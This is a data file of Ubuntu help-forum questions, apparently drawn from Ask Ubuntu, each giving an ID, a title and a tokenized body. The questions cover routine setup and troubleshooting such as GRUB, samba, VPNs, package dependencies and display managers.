202159	trying to install lamp+phpmyadmin	i am a total newbie and has seen lots of tutorials on the net but still ca n't solve my problems . i installed lamp+phpmyadmin the following way : sudo apt-get install lamp-server^ phpmyadmin here are my issues : 1 ) i need to change my document root . i need to set it to /data/www . i tried the `` ln '' function , it creates a shortcut but when i access http : //localhost it gives me 403 error . i believe there is some permissions issue but have no idea how to solve it . please help ! 2 ) trying to access phpmyadmin via http : //localhost/phpmyadmin does not work . how do i access it ? do i have to create some link to it ? any help is very appreciated !
202160	what is wrong with this python script ?	i have this code : from sys import argv import os bold = `` \033 [ 1m '' reset = `` \033 [ 0 ; 0m '' try : argv [ 1 ] except indexerror : print ( `` \nno arguments ! add \ '' -h\ '' or \ '' -- help\ '' for more info . '' + bold + `` \n\nnow look what you 've done ! '' + reset ) else : pass if argv [ 1 ] == `` -h '' or `` -- help '' : print ( `` \nxxxx , version 0.0.2 '' ) print ( `` xxxx is a simple tool for the command line used for quickly saving\n\ chunks of text , while providing more functionality than the traditional method\n\ ( e.g . echo \ '' hello world\ '' > hi.txt ) used in bash . '' ) print ( `` \nusage : sans-sheriff [ text ] [ directory ] [ options ] '' ) print ( `` \noptions : \n\ -h , -- help display this help message and exit.\n\ -v , -- verbose output more verbosity.\n\ -e=utf8 , -- encoding sets the encoding . default is utf-8.\n\ utf16\n\ utf32\n\ ascii\n\ iso ( 8859-1 ) \n\ -text sets the filetype . default is \ '' .txt\ '' .\n\ html\n\ rtf\n\ tex\n\ -o , -- open open the file directly after.\n\ \n\ e.g . xxxx \ '' hello world\ '' /home/user/documents/myfile -e=utf32 '' ) else : try : argv [ 2 ] except indexerror : print ( `` no directory argument ! add \ '' -h\ '' or \ '' -- help\ '' fopr mor info . '' + bold + `` \n\nnow look what you 've done ! '' + reset ) else : pass usrtxt = argv [ 1 ] usrdir = argv [ 2 ] usrtxt = open ( usrdir , `` w '' ) it is supposed to create text files based on a users ' arguments , like this : xxxx \ '' hello world\ '' /home/user/documents/myfile but whenever it is launched like the example provided , it just loads the output that would have been produced when -h or -- help is argued ... it does n't seem logical why it would do this , and i 'm quite a newbie to python as well , so any help would be greatly appreciated !
202161	how would i broadcast a subdomain/virtual name on a local server with people connected to the same network	i have a server connected to the router which has ubuntu 12.04 . it is has apache/mysql/php all installed ready to go . the folder structure is like this : /var/www -- this isnt the root -/libs -/logs -/public - this is the root -/vhosts - all subdomains go here i have a folder in vhosts named mysite . i went into /etc/apache2/sites-available and created a file and here are the contents - > ( vhost file ) . and i also added an entry in /etc/hosts file containing : 127.0.1.1 mysite.dev and i also did sudo a2ensite mysite i tried accessing the site from a computer via mysite.dev and our public ip into the server but i was not able to view it . the public directory in the structure above does display on all computers when i try our public ip . but for anything added in vhosts the site wont show . there is no domain attached its just our ip . i tried changing the port from 80 to say 9999 in the mysite file in sites-available and tried myip:9999 but that didnt work either . what am i doing wrong ? edit : i forgot to mention that the server is dmzed on the router .
202166	differences in compiling between gcc 4.4 and gcc 4.6 ?	i just moved from rh ( centos 6 ) with gcc 4.4.6 to ubuntu 12 with gcc 4.6.3 . i have a program that references a third party library . i have successfully build and installed the library on the ubuntu machine . when i run updatedb and locate libxxx.so i get the same exact results . i look for the header file the same way and also get the same exact results . i have a small test program that came from the centos box . it consists of one *.c file and a bash script to build and run it . it 's all very simple . the script looks like this : # ! /bin/bash rm -f a.out gcc -w -lpowerdna *.c exit 0 i have ld_library_path set ( on both the centos and ubuntu boxes ) to the directory where the header file and *.so reside . i have double , triple , and quadruple checked that the spelling and the capitalization are correct . ... and yet when i compile on the ubuntu machine , i get the undefined reference to ' < function name > ' error for every function call in the test program . to add to the general oddness , their defined types are not generating errors . when i comment out the # include in my test file , the compiler generates errors for the types . this is a very simple setup , with very few points of possible failure . i 'm certain i 'm doing something stupid , but for the life of me , i do n't see it . for completeness , i 'll post the pertinent parts . source file : # include < stdio.h > # include < signal.h > # include `` pdna.h '' // bare bones test program locate results : [ brian @ localhost dmap403 ] $ locate pdna.h /usr2/uei/daqlib/pdna.h [ brian @ localhost dmap403 ] $ locate libpowerdna /usr2/uei/daqlib/libpowerdna.so /usr2/uei/daqlib/libpowerdna.so.4 /usr2/uei/daqlib/libpowerdna.so.4.4.0 environment variable : [ brian @ localhost dmap403 ] $ env | grep ld_ ld_library_path= : /usr2/uei/daqlib when i compile on ubuntu , i get these results : /tmp/ccjaa183.o : in function 'main ' : dmap403.c : ( .text+0x6c ) : undefined reference to 'function name' collect2 : ld returned 1 exit status it looks like the compiler does n't know where the *.so is , but i have it in the ld_library_path . heck , i even added -l/usr2/uei/daqlib -lpowerdna to the gcc options to no avail . edit : perhaps this should be moved to the linux site ? edit : updated title to better reflect the question .
202168	which display manager should i use ? lightdm or gdm ?	i 'm a somewhat experienced noob on this linux-thing . i 'm growing quite familiar with ubuntu and i just love gnome ( 3+ ) . just by accident i was presented with a choice the other day . i was upgrading from an old ubuntu version and then i had to choose which display manager i wanted to use with the new version . throwing the dice ( even numbers = lightdm , odd numbers = gdm ) i got a five , hence , i choose gdm . i have a rather decent machine ( amd phenom ii hexa-core processor @ 3.2ghz , 16gb ram , too much disc space , generic on-board graphics card ) . i 'm currently running ubuntu 12.10 with gnome4 ( yes , i know , i 'm brave/stupid , considering the fact that both are still in beta stage ) . the machine has a quite central role in my network , but is almost exclusively connected to from other linux devices ( considering android as linux ) . basically , i just want to know which manager is the most optimal for my above mentioned system ( if there is a difference at all , but there is a reason someone wrote lightdm , right ? ) . are there any performance benefits or compatibility issues to consider ? will i notice a difference using one over the other ? remember i 'm a noob , i barely know what a display manager is or does . cheers , dbm p.s : i do n't want to start a gdm vs. lightdm war here ( i will delete the question at the first trolling attempt ) .
202170	alert when running applications from root	when i want to launch some applications from root user it alerts me that it may not be run as root and i need to log in as normal user . for example for google chrome or glob database visualization . why it says so and how can i enable it ?
202175	12.10 release time	i know 12.10 is being released on the 18th , but there 's no mention as to what time it is being released . this is peobably for flexibility , but is there an anticipated time it is suppossed to be released ? also , is the current nightly frozen and therefore effectively the same thing as tomorrow 's release ?
202187	best practices for using 'sudo su '	i have been using the terminal for a while now and sometimes ( actually , a lot of times ) i use a command , like : cp /etc/test ~/testfolder/ and i get this error : cp : can not open `/etc/test` for reading : permission denied that 's the moment i remember that i forgot the sudo command before it , so i press up arrow and then ctrl+a to go to the beggining of the line and insert a sudo there : sudo cp /etc/test ~/testfolder/ there are even worse scenarios where you use vim to edit a file , you forget sudo command and do n't see the warning when the program starts , you edit the entire file and in the end , you ca n't save it ! when you realize you 're doing it so many times , it becomes annoying , specially if you 're like me and used to type commands without the sudo . there is a way to solve this problem , when you start the terminal , just type sudo su to use commands as root user , but some say it 's more likely to make mistakes that you 'll regret forever . my question is , what 's the best practice for executing commands as root ? using sudo and missing it everytime or automatically use sudo bash and having the risk of destroying the entire system ?
202189	how do you remove an icon from the gnome panel ?	one of my ubuntu 12.04 users has switched from unity to gnome-panel ( a.k.a . `` gnome classic ( no effects ) '' ) , and came to me with this question : one you 've dropped an app icon onto the panel , how do you remove it ? i 'm stumped . i can get rid of everything by deleting the user 's ~/.config/dconf/user and ~/.cache/dconf/user , but that 's hardly an elegant solution . example :
202193	ca n't set environment variables in ~/.profile	all , i need to set environment variables in my ~/.profile since i am running a program ( qtcreator ) that does n't start a bash shell . i can not for the life of me get it to work though . qtcreator will not show any of the environment variables i defined under `` system environment . '' how can i do this ? edit : okay , actually it turns out my question is why ca n't i source my_environment where my_environment : export some_path=blalalal if i add export some_path=blalalal to my ~/.profile it works . but i ca n't use source ~/.profile
202194	how do i change to ksh ?	i need to learn some ksh details , but i do n't want to change from bash to ksh permanently . what should i do ? is it possible to change shell only for a specific console session ?
202199	problem to safely remove usb dongle	i use micromax usb data card device to establish internet connection . but the device ca n't be removed safely by using the option `` safely remove device '' . how can it solve ?
202202	backup torrents for clean install	tomorrow i 'm going to do a clean install of ubuntu 12.10 , since i 've been playing with some internals and now my system is quite messy . everything is prepared , my files backed up and i 've already made a list with the programs i 'm going to need , etc . but there 's still one thing missing : my torrents . i use transmission and , like everyone should , i like to keep my seeding my files after download . i 've set transmission to delete the .torrent files after i start to download . i actually do n't know if the torrents ' data is stored at the home directory or not . 1 ) is it stored on the home folder ? ( if it is , it 's not going to be a problem since i use a separate partition for the home folder ) 2 ) if it 's not , is there a way to backup the torrents ' info , so i can continue seeding after my clean install ?
202208	fglrx 3d wo n't work	i have followed all the steps to get fglrx catalyst 12.8 installed . it seems to be installed , but i getting terrible distortions on my screen : and i can only access unity 2d . any thoughts on fixing this so i can use 3d unity ?
202210	ca n't create facebook account in gwibber	ca n't create a facebook account . i start the procedure , add account , insert mail and password then it writes me back on a white page `` success '' and stops . the account is n't create ( seeing on youtube there are two or three more steps to do ) but gwibber do n't let me go ahead ; i can only press close . i tried to do this , remove all the gwibber references on my home ~/.config/gwibber ~/.cache/gwibber and reboot . nothing . then i tried to uninstall it via ubc and install it back . nothing . any ideas ? ?
202212	how to type special characters like @ , £ , $ with norwegian keyboard ?	as some of you may already know , in order to type in special characters ( like @ , £ , $ , et cetera ) , you need to hold ctrl and alt . however , i tried several options in the keyboard layout and progressed nowhere . holding ctrl and alt while pressing 2 so i can type @ does not work .
202217	wubi installer ca n't find metalink	i 've downloaded the latest version of wubi , but for xubuntu , kubuntu , and lubuntu , it is unable to find the metalink to download the iso . is there any way to fix this , or do i have to manually dualboot ? if so , how do i manually dualboot ? thanks .
202218	can i update a live usb ?	i made a persistent live usb with the usb-creator , and i was wondering if i can just update as one normally would , or if there are special procedures i need to take .
202223	fast way to burn dvd-r ( udf ) ?	we could create iso-9660 dvds by piping mkisofs into cdrecord . for udf , the procedure seems to be convoluted and slow . it creates a temporary blank 4gb file , then writes data into it , and only then burns it . is there a fast way to burn data dvd-rs in the udf format ?
202224	why does service service_name status give different responses for different services ?	running the `` service service_name status '' command gives three different types of output when three different service_names are used . i tried with atftpd , apache2 , and isc-dhcp-server , as shown below . user @ host : ~ $ service atftpd status usage : /etc/init.d/atftpd { start|stop|restart|reload|force-reload } user @ host : ~ $ service apache2 status apache2 is running ( pid 1103 ) . user @ host : ~ $ service isc-dhcp-server status isc-dhcp-server start/running , process 5696 could this be because atftpd has not been converted to upstart ? the status for isc-dhcp-server shows `` start/running '' which indicates it has been converted to use upstart . i would 've thought apache2 would have been converted to upstart already . if it has then why does it not display `` start/running '' ?
202227	get hd netflix videos on virtualbox	netflix works great on virtualbox , however it does n't show up with any options for hd viewing . i have installed guest additions , any way to get the hd option to show up ? e.g . http : //i.imgur.com/ioucy.png normally futurama has an hd button .
202228	what does ubuntu use instead of /etc/users	i am working on setting up a ubuntu system for a class project . i am trying to show how to check for existing users . my ubuntu has no /etc/users . waht does it use instead of /etc/users
202233	should ati catalyst be installed for sake of opencl ?	i have a hp envy 4 1025tx with hybrid graphics . although this is a 64bit system , i 've installed 32bit ubuntu on it for some reasons . ( hybrid graphics do n't do well with 64bit ubuntu.- '' some one on some forum '' ) i had heating problems with the gpu but i 've fixed them all with vgaswitcheroo . but now i wanted to use my blender on my ubuntu . to my surprise blender did n't detect the dedicated 7670m card in my machine . i 've confirmed with cat /sys/kernel/debug/vgaswitcheroo/switch both igd and dis were up and running . i dont seem to have libopencl on my /usr/lib even though my synaptic manager says that i have installed it . i 'm not quite sure what i 've installed . it says that i 've installed `` ocl-icd-libopencl1 '' . so my question is ... do i have opencl on my system ? if not do i have to get propreitary ati drivers for sake of opencl ( fglrx wrecks up my unity totally on my system i need directions to fix it if this is the choice ) ? should i get a 64bit ubuntu installed on this system ?
202234	can i migrate from wubi dual boot to regular dual boot ?	12.04 lts wubi `` f : \ image on partition '' and `` windows7 on c : \ '' wanted to test before using full install . however i kinda customized the looks and got lots of sw installed and now i do n't like the idea of reinstalling the whole thing all over again : d ... due to previous cloning my broken 320gb hdd to 500gb hdd i had ca . 180gb unallocated which i made as ntfs and it 's drive f : . i would like to make that drive ext with full ubuntu 12.04 but i 'd like , if possible , to make my current wubi installation a full one . now i read that it 's possible to migrate wubi to full . but.. is it safe with grub and windows 7 installed ? is there alternative how to keep all the installation/current state of ubuntu and get it to the new full install ?
202240	is ubuntu 12.04.1 windows wubi installer broken ?	i installed the newest release of ubuntu 12.04 with the wubi installer . the computer is up and running with ubuntu , i am typing this in firefox and i can use all the software that was supplied with the installation . however , it seems there is only a small selection of new apps that i am able to install . i have not done anything else on this installation except 1 ) run wubi to get ubuntu in there and 2 ) start it up and 3 ) try to install these applications that just wo n't install . for example , i managed to install inkscape and gparted . however , i could not install the latest proprietary nvidia drivers , i could not install skype , i could not install qt designer , nor could i install a number of other things i tried to get . for some of the failed installations i get an error which there is already a bug report for : `` package xxx could not be installed because package xxx is already installed '' or something similar . for others , it is a different error , for example `` the following packages have unmet dependencies : skype : depends : skype-bin but it is a virtual package '' . this issue forces me to return to windows , for now . but i would like to know if this is an issue specific to the wubi installer , so that i should try again but with a different installation option , such as getting a usb pen driver iso or something such ? or is there something else going on right now for pretty much everyone ? or maybe someone could even give me a hint as to how to solve the issue without downloading yet another iso ? ps . my ubuntu installation is on a different physical ssd than my windows installation . the system is a dell xps 17 .
202241	how to start vnc service remotely without first logging into ubuntu 12.04 locally	i tried the answers other similar queuest in ask ubuntu , but did n't get it to work . i reboot ubuntu 12.04 . i remote in using ssh , and do /usr/lib/vino/vino-server to start vnc service . ultravnc client reports : failed to connect to server ! but if i login at the ubuntu computer and try ultravnc again , it works .
202247	'teamviewer depends on ( ... ) ' while trying to install teamviewer	i recently got ubuntu installed on my server , i wanted to install teamviewer so i could easy manage the virtual machines , however , i get errors when installing it from app store ? , and i also get errors , but more detailed on the terminal . error output : tek @ tek-g53sw : ~/download $ sudo dpkg -i ipts teamviewer_linux_x64.deb dpkg : error processing ipts ( -- install ) : can not access archive : no such file or directory ( reading database ... 142115 files and directories currently installed . ) preparing to replace teamviewer7 7.0.9360 ( using teamviewer_linux_x64.deb ) ... unpacking replacement teamviewer7 ... dpkg : dependency problems prevent configuration of teamviewer7 : teamviewer7 depends on libc6-i386 ( > = 2.7 ) ; however : package libc6-i386 is not installed . teamviewer7 depends on lib32asound2 ; however : package lib32asound2 is not installed . teamviewer7 depends on lib32z1 ; however : package lib32z1 is not installed . teamviewer7 depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing teamviewer7 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : ipts teamviewer7 i tried to install it manually , but with no luck , i heard some others has this problems . i am running ubuntu 12.04 x64 . error @ sudo apt-get install libc6-i386 lib32asound2 lib32z1 ia32-libs : tek @ tek-g53sw : ~/download $ sudo apt-get install libc6-i386 lib32asound2 lib32z1 ia32-libs reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . tek @ tek-g53sw : ~/download $ more errors tek @ tek-g53sw : ~/download $ sudo apt-get -f install [ sudo ] password for tek : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : teamviewer7 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 81.9 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 142441 files and directories currently installed . ) removing teamviewer7 ... tek @ tek-g53sw : ~/download $ sudo apt-get install libc6-i386 lib32asound2 lib32z1 ia32-libs reading package lists ... done building dependency tree reading state information ... done lib32z1 is already the newest version . libc6-i386 is already the newest version . lib32asound2 is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . tek @ tek-g53sw : ~/download $ sudo apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : gtk2-engines : i386 but it is not going to be installed depends : gtk2-engines-murrine : i386 but it is not going to be installed depends : gtk2-engines-pixbuf : i386 but it is not going to be installed depends : gtk2-engines-oxygen : i386 but it is not going to be installed depends : ibus-gtk : i386 but it is not going to be installed depends : libcanberra-gtk-module : i386 but it is not going to be installed depends : libcups2 : i386 but it is not going to be installed depends : libcupsimage2 : i386 but it is not going to be installed depends : libfontconfig1 : i386 but it is not going to be installed depends : libgail-common : i386 but it is not going to be installed depends : libgphoto2-2 : i386 but it is not going to be installed depends : libgtk2.0-0 : i386 but it is not going to be installed depends : libnss3 : i386 but it is not going to be installed depends : libqt4-opengl : i386 but it is not going to be installed depends : libqt4-qt3support : i386 but it is not going to be installed depends : libqt4-scripttools : i386 but it is not going to be installed depends : libqt4-svg : i386 but it is not going to be installed depends : libqtgui4 : i386 but it is not going to be installed depends : libqtwebkit4 : i386 but it is not going to be installed depends : librsvg2-common : i386 but it is not going to be installed depends : libsane : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . tek @ tek-g53sw : ~/download $
202252	software for encryption of usb drive	i want to encrypt my sony usb pendrive . unfortunatelly my model is not supported by their own software , easylock . since i have to look for alternatives , i would like something that could work both on windows and ubuntu , because even though this pendrive is meant for carrying data to other pc 's ( university , pub pc 's , etc ) which probably run windows , i would like the possibility to decrypt and access the data on ubuntu as well , so a multiplatform solution would be welcome . i am aware of truecrypt , it works great and it does n't require installation , i can just bring the executable with me but it requires admin privileges for mounting the volumes in windows , and i really need to make sure i can decrypt the data whenever i need it , even if it is on a windows pc running a limited user account . is there any multiplatform encryption software for full usb pendrive or even creation of individual volumes that can decrypt its contents on ubuntu and also on windows without requiring admin privileges ?
202253	how to copy files from a remote computer ?	i have set up a new pc , and i want to copy data from my old pc to it , without having to manually copy everything to an external drive . i guess i could do something with rsync over ssh , but have no idea of how to accomplish that . anyone ?
202257	ubuntu freezing after boot	i have ubuntu 12.04 lts dual booting with windows 7 on my laptop without any problems and felt like doing the same on my desktop . however now that i have installed ubuntu on the desktop through wubi , if i boot into ubuntu the log in screen is as far as i get . i see my username and the password box but everything is completely unresponsive . i can move the mouse around the screen fine i just ca n't click on anything and the keyboard does n't seem to work at all as i 've tried a few shortcuts and there 's no response at all . i have done a some searches and i think it 's a driver issue but i do n't know how to fix them as i 'm pretty new to ubuntu and can not log in at all . desktop specs if needed : intel core i7 2700k , nvidia gtx 580 , 8gb ram . thanks in advance
202258	changing the icon of a cursor	in all version of windows , it 's easy for a user to change the actual pointer of a cursor to soemthign else , such as an icon of a dinosaur , for example . is there a program for the latest version of ubuntu desktop that enables a similar feature ?
202260	how to clear a firefox address bar without selecting its content ?	sometimes i need to move an url from an app to a browser . i select the url , say in gvim , and make firefox window active . then i see that i should clear address bar before pasting the new url , which requires selecting existing url , which wipes the new url from primary clipboard out . what is the best way to put the new url from primary clipboard to address bar ? is there a shortcut to clear address bar and then to move focus there ? ps i know i can use ctrl-c to put the new url to clipboard clipboard , but i prefer to use primary clipboard .
202263	how can i edit the config files of bluej without root permissions ?	in school i use ubuntu in my programmers class and we use bluej . this ide is set to german language but i want to have an english ide because iâ´m also programming in english . but to achieve this i have to modify a specific textfile . this file only can be accessed when you have root permissions . is there any `` inofficial '' way to change this file without root permissions ?
202284	connect to more vpns	i am using ubuntu 12.04lts on my vaio laptop and i am in a situation that i have to use two different vpns to have a good internet access and i do n't know how to achieve that.because when i click on a vpn to connect ( through networks- > vpn connections ) , current connected vpn will be disconnected first .
202285	how do i list the content of a ppa that i have added to ubuntu ?	i just added a ppa like so : sudo add-apt-repository ppa : stebbins/handbrake-releases now , how do i get to see which packages this ppa contains ?
202286	how to manage security cameras in ubuntu ?	i am setting up a server and chose ubuntu for the os . the system will have 3 purposes , storing my wife 's photography work , storing music for quick access to our entertainment system ( will be running the system through the tv and through our surround sound ) and will also serve as a dvr unit for a home security system i am going to put together . what sort of software options are there for the ubuntu system as far as a dvr with frame by frame playback . it does not need to be fancy but of course a variety of options are a nice touch .
202288	how do i require use of the 5 ghz band when connecting to a wireless n access point ?	what is says in the topic : there 's a wireless n access point to which i 'd like to connect using the 5 ghz band exclusively . how does one accomplish this ? using the directive band=a in the connection configuration file in /etc/networkmanager/system-connections does n't seem to affect anything ( /var/log/syslog still shows attempts by wpa_supplicant to connect using the 2.4 ghz band ) , and running iwconfig wlan0 freq 5g per this question results in the following error : error for wireless request `` set frequency '' ( 8b04 ) : set failed on device wlan0 ; invalid argument . [ edit ] i 'm hoping the answer wo n't depend on the hardware in use , but here 's some information about the hardware , just in case : system is an asus zenbook prime ux31a-db51 , running ubuntu 12.04. lspci output : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:04.0 signal processing controller : intel corporation device 0153 ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 00:1f.6 signal processing controller : intel corporation panther point thermal management controller ( rev 04 ) 02:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) the driver for the wireless interface is iwlwifi .
202299	xdotool mousemove blank screen script question	i have infamous screen going black after 10 minutes or so despite trying several solutions to avoid it in ubuntu 12.04 so i decided for the last solution which is emulating mouse move every 9 minutes i 've downloaded xdotool . my questions , and i guess they require simple answers ( which are needed , because iâm not really a comp freak ) : do i have to make a script for that . how do i make a script and where do i save it . how to make it running automatically ( every time computer starts ) , if that 's not happening by default so , i want to just emulate a mouse move by one pixel every 9 minutes , so that it is not disturbing and is efficient in keeping screen not going black after googling , i tried something like this : creating file .noblackscreen.sh in home directory ( where documents , music ... folders are ) ; typing in : # ! /bin/bash while sleep 540 do xdotool mousemove_relative 1 1 done what do i do wrong thanx so much
202300	need help reinstalling grub from live cd	in live cd i went in the terminal and when i do 'sudo update-grub ' it responds /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . here 's the breakdown of my drive : sda1 - vfat - windows 7 : fat32 sda2 - sda3 - nfs - windows vista/7 : ntfs - windows 7 sda3/wubi : - sda4 - grub2 sda5 - ubuntu 12.04.1 lts sda6 - sda7 - sda8 - bios boot partition also at the top of the page it states : = > no boot loader is installed in the mbr of /dev/sda any and all help is appreciated and welcomed . when my computer boots , it goes into grub and has the options for windows 7 and windows memory test but no option for ubuntu . i want to run a dual-boot through it .
202305	is it possible to install windows7 or any linux to a loop file from ubuntu ?	im just wondering is it possible to install windows7 or any linux to a loop file from ubuntu . just reverse of what wubi offers . loop file has to be on ext partition . i wish to easily switch to different test os without the hassle of partitioning . is it possible . ?
202308	acpi _osc control	i 've noticed an error from dmesg output that ubuntu canot enable aspm : [ 0.192722 ] pci0000:00 : acpi _osc support notification failed , disabling pcie aspm [ 0.192728 ] pci0000:00 : unable to request _osc control ( _osc support mask : 0x08 ) while i know that this is not a bug , i 'd like to ask if there is a way to correct it and enable aspm , the reason being that it should increase battery life ( powertop shows that pcie is always 100 % on ) . edit : i am running on an asus eee pc 1015px with the latest bios version ( 1401 )
202309	can not get grub menu to timeout ( or go away )	i am running ubuntu 12.04 . i can not for the life of me get the grub menu ( with options ) to go away . i would like it to auto-boot into the first option . i 've edited /etc/default/grub so that it looks like the following : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' after this , i ran sudo update-grub . then i realized that i had grub 2 , so i ran sudo update-grub2 ( both make it look like they create the grub.cfg file successfully . i restart my computer and it goes back to the grub menu and just sits there until i make a choice . this is not desirable if the power goes out ... : - ) i also tried reinstalling grub using sudo grub-install /dev/sda - also unsuccessful
202310	how to configure an ubuntu server so that all traffic goes through a vpn ?	this question is not about how to set up vpn on an ubuntu server . edited : i think what i 'm looking for is the way to set up a pptp vpn client on my ubuntu server by command line . i have an ubuntu server running and connected to the internet . i also have a vpn service ( pptp ) running on another linux machine . now all i want to do is configure this ubuntu server so that all the internet traffic it generates goes through the vpn . how can i achieve this ?
202313	error : file not found	error : file not found . press any key to continue ... -- i get this when after i choose ubuntu on start . pressing any key does n't work . what 's this ? i 'm new to ubuntu .
202321	package dbus is not configured yet	while attempting to upgrade ( sudo apt-get upgrade ) ubuntu 12.04 , i had a pair of packages that would throw the following apt-get install errors for the dbus dependency : dpkg : error processing dbus ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of accountsservice : accountsservice depends on dbus ; however : package dbus is not configured yet . dpkg : error processing accountsservice ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : dbus accountsservice e : sub-process /usr/bin/dpkg returned an error code ( 1 )
202323	what packages do i need to install in order to bulld postgres from source ?	i need to be able to build postgres-8.4.2 from source . what dependencies should i install ?
202326	gnupg make failure	i got errors as below when tried to make gnupg 2.0.19 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ compress.o : in function `init_uncompress ' : /home/steve/desktop/gnupg-2.0.19/g10/compress.c:147 : undefined reference to `inflateinit_' compress.o : in function `do_uncompress ' : /home/steve/desktop/gnupg-2.0.19/g10/compress.c:196 : undefined reference to `inflate' compress.o : in function `init_compress ' : /home/steve/desktop/gnupg-2.0.19/g10/compress.c:82 : undefined reference to `deflateinit_' compress.o : in function `init_uncompress ' : /home/steve/desktop/gnupg-2.0.19/g10/compress.c:147 : undefined reference to `inflateinit2_' compress.o : in function `init_compress ' : /home/steve/desktop/gnupg-2.0.19/g10/compress.c:82 : undefined reference to `deflateinit2_' compress.o : in function `compress_filter ' : /home/steve/desktop/gnupg-2.0.19/g10/compress.c:264 : undefined reference to `inflateend' /home/steve/desktop/gnupg-2.0.19/g10/compress.c:273 : undefined reference to `deflateend' collect2 : ld returned 1 exit status make [ 2 ] : *** [ gpg2 ] error 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ it looks like ld can not find object file which owns the reference above . my question is : how to determine which file i was missing ? how to resolve this issue ? many thanks in advance !
202328	how to find which app versions were/will be in given ubuntu release ?	sometimes i 'd like to know what version of certain apps was in various releases , or what ver is planned to be in the upcoming one . is there some such database ?
202332	can not access samba share from windows 7 using hostname	i 've been trying for days to get this working , and everywhere i look online it seems no one has a definitive answer , so here is the run down : i have an external drive attached to my ubuntu 12.04 machine , `` nicholas-desktop . '' i have the entire drive shared over the network via samba . if i try to access the drive from windows 7 by using `` \nicholas-desktop '' it fails saying it can not locate `` nicholas-desktop . '' however , if i use the current ip address assigned to my machine by my router 's dhcp server by typing `` \192.168.2.xxx '' i have no problems accessing the share . if i try to ping my ubuntu machine 's hostname from windows it fails . the same happens if i try to ping my windows machine , `` nicholas-laptop '' from my ubuntu machine . again , if i use either machine 's assigned ip address it works fine . can someone please help me get this working ? i do n't want any workarounds like setting a static ip , or dhcp reservation , i want to be able to resolve hostnames from both sides . i have tried enabling samba'a wins server so i could resolve the hostnames using netbios , however that did n't work either , i may have made a mistake setting it up though .
202333	picture lens does n't find anything	i get facebook results , but nothing from my computer . if i open a terminal and use 'locate ' then i can find stuff , but the picture lens is empty . note that my picture files are on an ntfs partition . i have made a link named 'pictures ' in my home folder that points to the location where the picture files are . again , this works with the 'locate ' command and it also works for the music lens , which is also a link in my home folder . it also ( kinda ) works for the video lens , though it only wants to find videos i have opened , which seems not consistent with the other lenses . ( and also not very useful this way )
202335	how can i track the cause of random reboots ?	a thinkpad x220 ( core-i5 , sandybridge , intel gma ) running precise 64bit has rebooted hard twice in the last four days . i was doing nothing more than writing an email . no warning . it just went black , and the next thing i saw was the lenovo boot screen . where should i look to find the cause ? i fear that this immediate reboot does not leave time for logs to be written ... thanks !
202341	installed ubuntu on 12.04 on my macbook air now i want to expand the partition	i recently installed ubuntu 12.04 on a 40gb partition on my mac book air ( 5,2 ) . i 'm having so much fun with it , i 'm ready to make the switch permanently and replace it as the primary os on my machine . i realize i can wipe the machine and start from scratch , but i 'm looking for alternatives since i like my current setup . options are ... create a backup and restore the back up to a larger partition ( assuming i should keep the default os x install for firmware updates ) create a backup and restore to the entire drive ( create a restore usb stick for osx - not sure if that 's possible ? ) re-size my current partition and wipe the os x partition and either , a. re-install os x ( similar to option 1 ) or b. create the usb key ( similar to option 2 ) . thoughts ? any other suggestions ? would also like thoughts on the `` optimal '' or `` best practice '' for partitioning ubuntu . thanks !
